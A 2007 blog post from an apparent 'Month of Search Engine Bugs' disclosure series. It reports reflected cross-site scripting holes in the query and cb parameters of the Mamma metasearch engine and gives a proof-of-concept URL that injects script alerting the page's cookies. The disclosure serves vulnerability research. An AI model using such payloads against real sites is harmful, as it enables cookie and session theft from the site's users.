« Добірка експлоітів
Місяць багів в Пошукових Системах: день чотирнадцятий »

MOSEB-14: Vulnerabilities at www.mamma.com

22:34 14.06.2007

Next participant of the project is Mamma search engine (Mamma Metasearch). It is one of the popular search engines (and it is meta engine).

The vulnerabilities are at Mamma (www.mamma.com) in web search. These Cross-Site Scripting holes I found 30.05.2007.

XSS:

The vulnerabilities are in query and cb parameters:
http://www.mamma.com/Mamma?cb=Askjeeves_mamma&query=test--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: meta searching can be dangerous.


This entry was posted on 22:34 14.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.